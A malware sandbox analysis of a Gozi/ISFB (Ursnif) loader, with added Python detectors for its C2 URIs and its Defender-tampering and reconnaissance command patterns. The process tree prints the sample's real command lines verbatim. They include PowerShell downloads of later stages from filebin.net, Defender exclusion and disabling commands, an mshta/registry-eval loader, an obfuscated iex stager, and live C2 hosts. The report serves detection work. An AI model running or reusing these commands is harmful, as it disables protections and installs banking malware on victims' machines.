Analysis
  max time kernel: 150s
  max time network: 138s
  platform: windows10-2004_x64
  resource: win10v2004-en-20220113
  submitted: 22/03/2022, 14:51
Static task: static1
Behavioral task: behavioral1
  Sample: 6239dfea99c25.exe
  Resource: win7-20220310-en
General
  Target: 6239dfea99c25.exe
  Size: 154KB
  MD5: b5946ff13e7698c7e2f26491885ddaab
  SHA1: 5a30f2c32c05cdf7ea86a916bb7b529c647e56b4
  SHA256: b6814794481de92b96493819677c96320d500487b82fd6eb72018faba8a831eb
  SHA512: 4b296cc73916bf75bc1ab0feadf076b1794a88ba83663c1803e3342b14ff223b85f4d27b86c244088aa8f3eef309b1948f0db9ff71775f7d6e7759ca76b6dca7
Malware Config

Extracted: gozi_ifsb
  Botnet: 3000
  C2: config.edge.skype.com, 194.76.226.200, giporedtrip.at, habpfans.at, 31.214.157.187
  base_path: /drew/
  build: 250225
  exe_type: loader
  extension: .jlk
  server_id: 50

Extracted: gozi_ifsb
  Botnet: 3000
  C2: config.edge.skype.com, 194.76.226.200, giporedtrip.at, habpfans.at, 31.214.157.187
  base_path: /images/
  build: 250225
  exe_type: worker
  extension: .jlk
  server_id: 50

Reading the two configs: they belong to the same build (250225, server_id 50, botnet 3000) and differ only in exe_type and base_path, i.e. the loader component beacons under /drew/ and the worker component under /images/, both with the .jlk request suffix. config.edge.skype.com is a legitimate Microsoft host; ISFB lists it first and contacts it as a connectivity check before using the real C2 servers, so treat the two IPs and two .at domains as the blockable indicators and the Skype host only as context.
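The configs give a network detection what it needs: the C2 hosts, the two URI prefixes (/drew/ for the loader, /images/ for the worker) and the .jlk suffix, and the Suricata hit "URI Struct M2 (_2F)" shows the _2F escape ISFB uses inside its base64-encoded request. The following Python is an added example written for this page, not sandbox or report code: it scans proxy-log records for that structure using the values above. Assumptions not taken from the report: the _2B and _3D escapes and the 40-character minimum blob length come from public ISFB write-ups, and the log records (hosts from the config, blobs filled with random characters of the right alphabet) are constructed for the example.

```python
import re
from dataclasses import dataclass, field

# Values copied from the two extracted gozi_ifsb configs above.
ISFB_CONFIGS = [
    {"exe_type": "loader", "base_path": "/drew/",   "extension": ".jlk"},
    {"exe_type": "worker", "base_path": "/images/", "extension": ".jlk"},
]
C2_HOSTS = {"194.76.226.200", "giporedtrip.at", "habpfans.at", "31.214.157.187"}

# Listed first in both configs but a legitimate Microsoft host that ISFB
# contacts as a connectivity check; deliberately NOT part of the blocklist.
CONNECTIVITY_CHECK_HOSTS = {"config.edge.skype.com"}

# ISFB base64-encodes its encrypted request and rewrites the characters that
# are not URL-safe: '+' -> _2B, '/' -> _2F, '=' -> _3D. The report evidences
# only _2F (Suricata rule name); _2B/_3D and the 40-char floor are assumptions
# taken from public ISFB write-ups, not from this analysis.
ESCAPES = re.compile(r"_2[BF]|_3D")
BLOB_CHARS = re.compile(r"^[A-Za-z0-9_/]+$")
MIN_BLOB_LEN = 40


@dataclass
class Hit:
    host: str
    path: str
    reasons: list = field(default_factory=list)


def match_request(host: str, path: str) -> list:
    """Return the reasons one request looks like ISFB C2 traffic ([] if none)."""
    reasons = []
    if host in C2_HOSTS:
        reasons.append("host in extracted C2 list")
    for cfg in ISFB_CONFIGS:
        if not (path.startswith(cfg["base_path"]) and path.endswith(cfg["extension"])):
            continue
        blob = path[len(cfg["base_path"]):-len(cfg["extension"])]
        if len(blob) >= MIN_BLOB_LEN and BLOB_CHARS.match(blob) and ESCAPES.search(blob):
            reasons.append(f"{cfg['exe_type']} URI structure {cfg['base_path']}<blob>{cfg['extension']}")
        break
    return reasons


def scan(records) -> list:
    """records: iterable of 'host<TAB>path' strings, e.g. a proxy export."""
    hits = []
    for rec in records:
        rec = rec.strip()
        if not rec or rec.startswith("#"):
            continue
        host, path = rec.split("\t", 1)
        reasons = match_request(host.lower(), path)
        if reasons:
            hits.append(Hit(host, path, reasons))
    return hits


# Constructed sample, not sandbox output: hosts and prefixes come from the
# config, the encoded blobs are filler in the right alphabet.
SAMPLE_PROXY_LOG = [
    "config.edge.skype.com\t/",
    "giporedtrip.at\t/drew/oHKI8Dr3Dcvf_2Fmv9F1uB7T8GnnQ5L_2BkxE/Jw3f1Ht9pDwDuR2X_3D.jlk",
    "cdn.example.com\t/images/logo.png",
    "31.214.157.187\t/images/Pq7Wm2xNvZ_2Fk3LaT0bRcY9EdHs5UjFo1/gI4lM6nV_3D_3D.jlk",
    "habpfans.at\t/favicon.ico",
]

if __name__ == "__main__":
    for h in scan(SAMPLE_PROXY_LOG):
        print(h.host, h.path, "->", "; ".join(h.reasons))
```

The structure check is kept separate from the host check on purpose: the URI shape survives a C2 rotation, while a hit on a known host with an ordinary path (the /favicon.ico record) is still worth surfacing but with lower confidence.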
Signatures

Chain as recorded in this run: 6239dfea99c25.exe is an IExpress self-extractor (extraction directory IXP000.TMP, RunOnce\wextract_cleanup0) that runs bruhad.bat. The batch uses PowerShell to exclude C:\Users from Defender and to fetch looad.exe from filebin.net; looad.exe runs an embedded batch (65BE.bat) that clears active detections, adds further exclusions, turns off cloud reporting and sample submission, and fetches load.exe. A later stage runs under Explorer.EXE: mshta.exe evaluates a script stored in HKCU\Software\AppDataLow\Software\Microsoft\3B357854-5E29-2581-409F-72297443C66D (value PlayStop), which starts PowerShell to decode and iex a second value (StopLocal); that PowerShell compiles code with csc.exe (the footprint of Add-Type) and writes into Explorer.EXE (PID 2688). Explorer then writes into three RuntimeBroker.exe instances and a cmd.exe, runs the host reconnaissance commands (systeminfo, net view, nltest, tasklist /SVC, driverquery, reg query, net config, nslookup) into %TEMP%\8D5F.bin1, and deletes load.exe after a ping delay. The extracted configs and the Suricata hits identify the payload as Gozi/ISFB (Ursnif).

Network (Suricata)
- ET MALWARE Ursnif Payload Request (cook32.rar)
- ET MALWARE Ursnif Payload Request (cook64.rar)
- ET MALWARE Ursnif Variant CnC Beacon
- ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
- ET MALWARE Ursnif Variant CnC Data Exfil
The two payload-request rules are the 32- and 64-bit variants of the same follow-on module download; the beacon, URI-structure and exfil rules cover the C2 traffic itself.

Blocklisted process makes network request (4 IoCs)
  flow  pid   Process
  11    4524  powershell.exe
  13    4524  powershell.exe
  16    2332  powershell.exe
  17    2332  powershell.exe
  (PID 4524 downloads looad.exe, PID 2332 downloads load.exe; both via Invoke-WebRequest from filebin.net.)

Downloads MZ/PE file

Executes dropped EXE (2 IoCs)
  pid   Process
  4712  looad.exe
  872   load.exe

Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up the country code configured in the registry, likely a geofence.
  description        ioc                                                                                                   Process
  Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  looad.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  mshta.exe

Adds Run key to start application (2 TTPs, 2 IoCs)
  description      ioc                                                                      Process
  Key created      \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce       6239dfea99c25.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""  6239dfea99c25.exe
  Caveat: this RunOnce value is the standard IExpress/wextract cleanup entry (it deletes the IXP000.TMP extraction directory at next logon), not malware persistence. The persistence-relevant artefact in this run is the script stored under HKCU\Software\AppDataLow\Software\Microsoft\3B357854-5E29-2581-409F-72297443C66D that mshta.exe reads; the report does not show how that mshta.exe instance was launched.

Suspicious use of SetThreadContext (7 IoCs)
  source pid  source process  target pid  target index
  1524        powershell.exe  2688        44
  2688        Explorer.EXE    3544        22
  2688        Explorer.EXE    2296        113
  2688        Explorer.EXE    3840        40
  2296        cmd.exe         2584        115
  2688        Explorer.EXE    3272        38
  2688        Explorer.EXE    1912        123
  (Targets 3544, 3840 and 3272 are the RuntimeBroker.exe instances; 2296 and 1912 are cmd.exe instances; 2584 is PING.EXE.)

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). The sandbox labels this "likely ransomware behaviour", but that is a generic heuristic: nothing else in this report (no file encryption, no ransom note) supports it, and the payload is a Gozi/ISFB loader.

Discovers systems in the same network (1 TTPs, 3 IoCs)
  pid   Process
  4612  net.exe
  4576  net.exe
  4120  net.exe

Enumerates processes with tasklist (1 TTPs, 1 IoCs)
  pid   Process
  3124  tasklist.exe

Gathers system information (1 TTPs, 1 IoCs)
  Runs systeminfo.exe.
  pid   Process
  1988  systeminfo.exe

Runs net.exe

Runs ping.exe (1 TTPs, 1 IoCs)
  pid   Process
  2584  PING.EXE
  (ping localhost -n 5 is used as a sleep before deleting load.exe.)

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  pid   Process
  2584  PING.EXE

Suspicious behavior: EnumeratesProcesses (64 IoCs, list capped)
  pid   Process
  2252  powershell.exe (2)
  4524  powershell.exe (2)
  1816  powershell.exe (2)
  4848  powershell.exe (2)
  2932  powershell.exe (2)
  228   powershell.exe (2)
  2956  powershell.exe (2)
  2332  powershell.exe (2)
  872   load.exe (2)
  1524  powershell.exe (2)
  2688  Explorer.EXE (all remaining entries)

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  pid   Process
  2688  Explorer.EXE

Suspicious behavior: MapViewOfSection (7 IoCs)
  pid   Process
  1524  powershell.exe
  2688  Explorer.EXE (5)
  2296  cmd.exe

Suspicious use of AdjustPrivilegeToken (18 IoCs)
  Token                     pid   Process
  SeDebugPrivilege          2252  powershell.exe
  SeDebugPrivilege          4524  powershell.exe
  SeDebugPrivilege          1816  powershell.exe
  SeDebugPrivilege          4848  powershell.exe
  SeDebugPrivilege          2932  powershell.exe
  SeDebugPrivilege          228   powershell.exe
  SeDebugPrivilege          2956  powershell.exe
  SeDebugPrivilege          2332  powershell.exe
  SeDebugPrivilege          1524  powershell.exe
  SeShutdownPrivilege       2688  Explorer.EXE (4)
  SeCreatePagefilePrivilege 2688  Explorer.EXE (4)
  SeDebugPrivilege          3124  tasklist.exe

Suspicious use of SetWindowsHookEx (1 IoCs)
  pid   Process
  2688  Explorer.EXE

Suspicious use of WriteProcessMemory (64 IoCs, duplicates collapsed)
  source pid  source process     target pid  target index
  1488        6239dfea99c25.exe  1708        80
  1708        cmd.exe            2252        82
  1708        cmd.exe            4524        83
  1708        cmd.exe            4712        84
  4712        looad.exe          1608        85
  1608        cmd.exe            1816        87
  1608        cmd.exe            4848        90
  1608        cmd.exe            2932        92
  1608        cmd.exe            228         94
  1608        cmd.exe            2956        96
  1608        cmd.exe            2332        97
  1608        cmd.exe            872         100
  404         mshta.exe          1524        107
  1524        powershell.exe     5048        109
  5048        csc.exe            4536        110
  1524        powershell.exe     1816        111
  1816        csc.exe            4216        112
  1524        powershell.exe     2688        44
  2688        Explorer.EXE       3544        22
  2688        Explorer.EXE       2296        113
  2688        Explorer.EXE       3840        40
  2296        cmd.exe            2584        115
  2688        Explorer.EXE       3272        38
  2688        Explorer.EXE       4848        116
  4848        cmd.exe            220         118
  Most rows are a parent writing into a child it has just created and are not significant on their own. The injection-relevant rows are 1524 powershell.exe -> 2688 Explorer.EXE (the injected Explorer then has no legitimate reason to write into anything) and 2688 Explorer.EXE -> 3544/3840/3272 RuntimeBroker.exe and -> 2296 cmd.exe. Note the PID reuse within this single run (1816 is first powershell.exe, then csc.exe; 4848 is first powershell.exe, then cmd.exe; 4536 and 4216 are first cvtres.exe, then cmd.exe): correlate on the report's target index, not on PID alone.
Processes
(Indentation shows parent/child depth from the report's process tree; "[U+200B]" marks a zero-width space that is present in the recorded command line and that the raw report rendered as the mojibake "ΓÇï". The three RuntimeBroker.exe instances and Explorer.EXE are pre-existing system processes: they appear here because Explorer.EXE (PID 2688), after being written into by powershell.exe 1524, spawned the children listed under it and wrote into the RuntimeBroker instances, see the SetThreadContext and WriteProcessMemory signatures above.)

- PID 3544  C:\Windows\System32\RuntimeBroker.exe
  command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- PID 3272  C:\Windows\System32\RuntimeBroker.exe
  command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- PID 3840  C:\Windows\System32\RuntimeBroker.exe
  command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- PID 2688  C:\Windows\Explorer.EXE
  command line: C:\Windows\Explorer.EXE
  signatures: Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: GetForegroundWindowSpam; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - PID 1488  C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe"
    signatures: Adds Run key to start application; Suspicious use of WriteProcessMemory
    - PID 1708  C:\Windows\SYSTEM32\cmd.exe
      command line: cmd /c bruhad.bat
      signatures: Suspicious use of WriteProcessMemory
      - PID 2252  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell -command "Add-MpPreference -ExclusionPath "C:\Users"
        signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - PID 4524  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell -command "Invoke-WebRequest -uri https://filebin.net/ezig0gb1jw3em8r7/looad.exe -o looad.exe"
        signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - PID 4712  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\looad.exe
        command line: looad.exe
        signatures: Executes dropped EXE; Checks computer location settings; Suspicious use of WriteProcessMemory
        - PID 1608  C:\Windows\system32\cmd.exe
          command line: "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\65BC.tmp\65BD.tmp\65BE.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\looad.exe"
          signatures: Suspicious use of WriteProcessMemory
          (looad.exe drops an embedded batch file to a nested temp directory and runs it with its own path as the argument; the batch below does the Defender tampering.)
          - PID 1816  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            command line: powershell -command "Remove-MpThreat"
            signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
          - PID 4848  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            command line: powershell -command "Set-MpPreference -ExclusionExtension exe"
            signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
          - PID 2932  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            command line: powershell -command "Add-MpPreference -ExclusionPath "C:\Users"
            signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
          - PID 228  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            command line: powershell -command "Set-MpPreference -MAPSReporting 0[U+200B]"
            signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
            (MAPSReporting 0 disables cloud-delivered protection.)
          - PID 2956  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            command line: PowerShell -command "Set-MpPreference -SubmitSamplesConsent 2"[U+200B]
            signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
            (SubmitSamplesConsent 2 is "never send" sample submission.)
          - PID 2332  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            command line: powershell -command "Invoke-WebRequest -uri https://filebin.net/ezig0gb1jw3em8r7/load.exe -o load.exe"
            signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
          - PID 872  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\load.exe
            command line: load.exe
            signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses
  - PID 404  C:\Windows\System32\mshta.exe
    command line: "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Y03p='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Y03p).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\3B357854-5E29-2581-409F-72297443C66D\\\PlayStop'));if(!window.flag)close()</script>"
    signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
    (The HTA body is inline, so there is no .hta file on disk; the stage it runs lives in the registry value PlayStop.)
    - PID 1524  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xadjxtwdw -value gp; new-alias -name lhnwkd -value iex; lhnwkd ([System.Text.Encoding]::ASCII.GetString((xadjxtwdw "HKCU:Software\AppDataLow\Software\Microsoft\3B357854-5E29-2581-409F-72297443C66D").StopLocal))
      signatures: Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      (gp is the alias for Get-ItemProperty and iex for Invoke-Expression; the aliases exist only to hide those names from command-line matching. This process is the one that writes into Explorer.EXE 2688.)
      - PID 5048  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x3inmo35\x3inmo35.cmdline"
        signatures: Suspicious use of WriteProcessMemory
        - PID 4536  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2572.tmp" "c:\Users\Admin\AppData\Local\Temp\x3inmo35\CSCAD89A661A4034B56BD98BEBDC6FA94CA.TMP"
      - PID 1816  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3kgaxgp0\3kgaxgp0.cmdline"
        signatures: Suspicious use of WriteProcessMemory
        - PID 4216  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES268C.tmp" "c:\Users\Admin\AppData\Local\Temp\3kgaxgp0\CSC6E24615EF38442F7BFB7EE57DB209138.TMP"
  - PID 2296  C:\Windows\System32\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\load.exe"
    signatures: Suspicious use of SetThreadContext; Suspicious behavior: MapViewOfSection; Suspicious use of WriteProcessMemory
    - PID 2584  C:\Windows\system32\PING.EXE
      command line: ping localhost -n 5
      signatures: Runs ping.exe; Suspicious behavior: CmdExeWriteProcessMemorySpam
  - PID 4848  C:\Windows\system32\cmd.exe
    command line: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\EE19.bi1"
    signatures: Suspicious use of WriteProcessMemory
    (Resolving myip.opendns.com against resolver1.opendns.com returns the host's public IP address.)
    - PID 220  C:\Windows\system32\nslookup.exe
      command line: nslookup myip.opendns.com resolver1.opendns.com
  - PID 920  C:\Windows\system32\cmd.exe
    command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EE19.bi1"
  - PID 4144  C:\Windows\system32\cmd.exe
    command line: cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
    - PID 1988  C:\Windows\system32\systeminfo.exe
      command line: systeminfo.exe
      signatures: Gathers system information
  - PID 1912  C:\Windows\syswow64\cmd.exe
    command line: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
    (32-bit cmd.exe with a meaningless command line; it is a SetThreadContext target of Explorer.EXE, i.e. a host for injected code.)
  - PID 3596  C:\Windows\system32\cmd.exe
    command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
  - PID 3664  C:\Windows\system32\cmd.exe
    command line: cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
    - PID 4612  C:\Windows\system32\net.exe
      command line: net view
      signatures: Discovers systems in the same network
  - PID 1672  C:\Windows\system32\cmd.exe
    command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
  - PID 1808  C:\Windows\system32\cmd.exe
    command line: cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
    - PID 3988  C:\Windows\system32\nslookup.exe
      command line: nslookup 127.0.0.1
  - PID 4616  C:\Windows\system32\cmd.exe
    command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
  - PID 3556  C:\Windows\system32\cmd.exe
    command line: cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
    - PID 3124  C:\Windows\system32\tasklist.exe
      command line: tasklist.exe /SVC
      signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
  - PID 4760  C:\Windows\system32\cmd.exe
    command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
  - PID 3920  C:\Windows\system32\cmd.exe
    command line: cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
    - PID 2800  C:\Windows\system32\driverquery.exe
      command line: driverquery.exe
  - PID 2696  C:\Windows\system32\cmd.exe
    command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
  - PID 2132  C:\Windows\system32\cmd.exe
    command line: cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
    - PID 4148  C:\Windows\system32\reg.exe
      command line: reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
  - PID 4904  C:\Windows\system32\cmd.exe
    command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
  - PID 5088  C:\Windows\system32\cmd.exe
    command line: cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
    - PID 4236  C:\Windows\system32\net.exe
      command line: net config workstation
      - PID 2100  C:\Windows\system32\net1.exe
        command line: C:\Windows\system32\net1 config workstation
  - PID 4536  C:\Windows\system32\cmd.exe
    command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
  - PID 4216  C:\Windows\system32\cmd.exe
    command line: cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
    - PID 1992  C:\Windows\system32\nltest.exe
      command line: nltest /domain_trusts
  - PID 1436  C:\Windows\system32\cmd.exe
    command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
  - PID 1980  C:\Windows\system32\cmd.exe
    command line: cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
    - PID 3696  C:\Windows\system32\nltest.exe
      command line: nltest /domain_trusts /all_trusts
  - PID 2384  C:\Windows\system32\cmd.exe
    command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
  - PID 4664  C:\Windows\system32\cmd.exe
    command line: cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
    - PID 4576  C:\Windows\system32\net.exe
      command line: net view /all /domain
      signatures: Discovers systems in the same network
  - PID 4328  C:\Windows\system32\cmd.exe
    command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
  - PID 2292  C:\Windows\system32\cmd.exe
    command line: cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
    - PID 4120  C:\Windows\system32\net.exe
      command line: net view /all
      signatures: Discovers systems in the same network
  - PID 2728  C:\Windows\system32\cmd.exe
    command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
  - PID 696  C:\Windows\system32\cmd.exe
    command line: cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\8D5F.bin1 > C:\Users\Admin\AppData\Local\Temp\8D5F.bin & del C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"
    (cmd /U re-emits the collected output as UTF-16 into 8D5F.bin and removes the working file; the .bin file is what the C2 exfil signature above refers to.)
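The tree above shows two host-side patterns worth a detection: Defender tampering through PowerShell (Add-MpPreference, Set-MpPreference, Remove-MpThreat, two of the lines carrying a trailing zero-width space that an exact-string match would never see) and the reconnaissance burst in which one parent runs systeminfo, net view, nltest, tasklist and the others, appending each result to the same file under %TEMP%. The following Python is an added example for this page, not code from the sandbox: it runs both checks over process-creation records modelled on the tree (tab-separated time, pid, ppid, image, command line; the timestamps, the PID 4321/5555 control record and the inv.txt path are constructed, the rest is copied from the tree).

```python
import re
from collections import defaultdict

# Code points a naive signature would not see; two Set-MpPreference lines in
# the tree end in U+200B (rendered as the mojibake "ΓÇï" in the raw report).
ZERO_WIDTH = dict.fromkeys(map(ord, "\u200b\u200c\u200d\u2060\ufeff"))


def normalize(cmdline: str) -> str:
    """Strip zero-width characters and lower-case before matching."""
    return cmdline.translate(ZERO_WIDTH).lower()


DEFENDER_TAMPER = [
    (re.compile(r"add-mppreference.*-exclusionpath"),            "Defender path exclusion added"),
    (re.compile(r"set-mppreference.*-exclusionextension"),       "Defender extension exclusion added"),
    (re.compile(r"set-mppreference.*-mapsreporting\s+0"),        "cloud-delivered protection disabled"),
    (re.compile(r"set-mppreference.*-submitsamplesconsent\s+2"), "sample submission set to never"),
    (re.compile(r"remove-mpthreat"),                             "active detections cleared"),
]

RECON_TOOLS = [
    ("systeminfo",  re.compile(r"\bsysteminfo\b")),
    ("net view",    re.compile(r"\bnet(\.exe)? view\b")),
    ("net config",  re.compile(r"\bnet(\.exe)? config\b")),
    ("nltest",      re.compile(r"\bnltest\b")),
    ("tasklist",    re.compile(r"\btasklist\b")),
    ("driverquery", re.compile(r"\bdriverquery\b")),
    ("reg query",   re.compile(r"\breg(\.exe)? query\b")),
    ("nslookup",    re.compile(r"\bnslookup\b")),
]
# Output redirected (> or >>) into a file under the user's temp directory.
RECON_SINK = re.compile(r'>>?\s*"?(c:\\users\\[^"\s]+\\appdata\\local\\temp\\[^"\s]+)')


def parse_events(text: str) -> list:
    """Tab-separated 'time pid ppid image commandline' records, one per line."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, pid, ppid, image, cmd = line.split("\t", 4)
        events.append({"ts": ts, "pid": int(pid), "ppid": int(ppid),
                       "image": image.lower(), "cmd": cmd})
    return events


def defender_tamper_hits(events) -> list:
    """(pid, label) for every PowerShell command line that changes Defender state."""
    hits = []
    for ev in events:
        if not ev["image"].endswith("powershell.exe"):
            continue
        cmd = normalize(ev["cmd"])
        for pattern, label in DEFENDER_TAMPER:
            if pattern.search(cmd):
                hits.append((ev["pid"], label))
    return hits


def recon_burst_hits(events, min_tools: int = 4) -> dict:
    """Group cmd.exe children by (parent pid, sink file); alert when one parent
    funnels at least min_tools distinct recon tools into the same file."""
    tools_by_sink = defaultdict(set)
    for ev in events:
        if not ev["image"].endswith("cmd.exe"):
            continue
        cmd = normalize(ev["cmd"])
        sink = RECON_SINK.search(cmd)
        if not sink:
            continue
        for label, pattern in RECON_TOOLS:
            if pattern.search(cmd):
                tools_by_sink[(ev["ppid"], sink.group(1))].add(label)
    return {key: sorted(tools) for key, tools in tools_by_sink.items()
            if len(tools) >= min_tools}


# Constructed records modelled on the tree; the \u200b characters reproduce
# the zero-width spaces in the two Set-MpPreference command lines.
SAMPLE_EVENTS = """\
14:51:40\t228\t1608\tpowershell.exe\tpowershell -command "Set-MpPreference -MAPSReporting 0\u200b"
14:51:41\t2956\t1608\tpowershell.exe\tPowerShell -command "Set-MpPreference -SubmitSamplesConsent 2"\u200b
14:51:42\t2932\t1608\tpowershell.exe\tpowershell -command "Add-MpPreference -ExclusionPath "C:\\Users"
14:52:10\t4144\t2688\tcmd.exe\tcmd /C "systeminfo.exe > C:\\Users\\Admin\\AppData\\Local\\Temp\\8D5F.bin1"
14:52:11\t3664\t2688\tcmd.exe\tcmd /C "net view >> C:\\Users\\Admin\\AppData\\Local\\Temp\\8D5F.bin1"
14:52:12\t3556\t2688\tcmd.exe\tcmd /C "tasklist.exe /SVC >> C:\\Users\\Admin\\AppData\\Local\\Temp\\8D5F.bin1"
14:52:13\t4216\t2688\tcmd.exe\tcmd /C "nltest /domain_trusts >> C:\\Users\\Admin\\AppData\\Local\\Temp\\8D5F.bin1"
14:52:14\t1672\t2688\tcmd.exe\tcmd /C "echo -------- >> C:\\Users\\Admin\\AppData\\Local\\Temp\\8D5F.bin1"
14:52:20\t4321\t5555\tcmd.exe\tcmd /C "systeminfo > C:\\Users\\Admin\\AppData\\Local\\Temp\\inv.txt"
"""

if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    print(defender_tamper_hits(evs))
    print(recon_burst_hits(evs))
```

Grouping on the parent PID plus the sink file rather than on the individual tool is what separates this burst from an administrator running systeminfo once: the lone systeminfo under parent 5555 stays below the threshold.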